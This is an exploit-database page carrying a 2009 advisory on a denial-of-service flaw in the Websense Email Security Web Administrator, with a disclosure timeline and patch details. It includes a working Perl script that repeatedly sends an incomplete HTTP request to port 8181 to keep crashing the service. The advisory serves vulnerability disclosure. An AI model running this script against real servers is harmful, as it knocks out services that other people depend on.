0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Websense Email Security DoS
=========================== Websense Email Security DoS =========================== Title: Websense Email Security Web Administrator DoS Severity: Low Vendor: Websense (http://www.websense.com/) Affected Products: Websense Email Security v7.1 Personal Email Manager v7.1 Not Affected Products: Websense Email Security v7.1 Hotfix 4 Personal Email Manager v7.1 Hotfix 4 Remote Exploitable: Yes Local Exploitable: Yes Patch Status: Patched with Hotfix 4 Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: for the permission to use his Policy Background: =========== Websense Email Security software incorporates multiple layers of real-time Web security and data security intelligence to provide leading email protection from converged email and Web 2.0 threats. It helps to manage outbound data leaks and compliance risk, and enables a consolidated security strategy with the trusted leader in Essential Information Protection. (Product description from Websense Website) The Websense Email Security Web Administrator is a webfrontend, which enables you to access the message administration, directory management and to view the log. Description: ============ The Web Administrator frontend (STEMWADM.EXE) listens by default on port TCP/8181. If an attacker sends a HTTP Request to port 8181 without waiting for a response the webserver crashes. The proof of concept script just sends a "GET /index.asp" and closes the socket. The server can not response to the request anymore and dies. By default the service will always restart after a crash. So the poc will send the request until it will be stopped. Proof of Concept : ================== #!/usr/bin/perl use Socket; (($target = $ARGV[0]) && ($port = $ARGV[1])) || die "Usage: $0 ", "<target> <port> \n"; print "\nThe Webserver on http://$target:$port should be dead until", "this script is running\n"; while (1) { $ip = inet_aton($target) || die "host($target) not found.\n"; $sockaddr = pack_sockaddr_in($port, $ip); socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "socket error.\n"; connect(SOCKET, $sockaddr) || die "connect $target $port error.\n"; print SOCKET "GET /index.asp"; print "Request sent ...\n"; close(SOCKET); sleep 1; }; Solution: ========= Vendor released a patch. http://tinyurl.com/yhe3hqa Disclosure Timeline (YYYY/MM/DD): ================================= 2009.09.28: Vulnerability found 2009.10.01: Ask for a PGP Key 2009.10.01: Websense sent there PGP Key 2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure date to Vendor 2009.10.08: Websense was not able to reproduce the DoS Problem 2009.10.08: Sent a mail with more explanation 2009.10.13: Websense verifies the finding and fixed it. The path will be available in Version 7.2 which will be released in ~2 weeks 2009.10.13: Ask for a list of affected versions/products and changed the release date to 2009.10.29. (no response) 2009.10.20: Found the KB article and the Hotfix on Websense website 2009.10.20: Release of this advisory # 0day.today [2024-09-28] #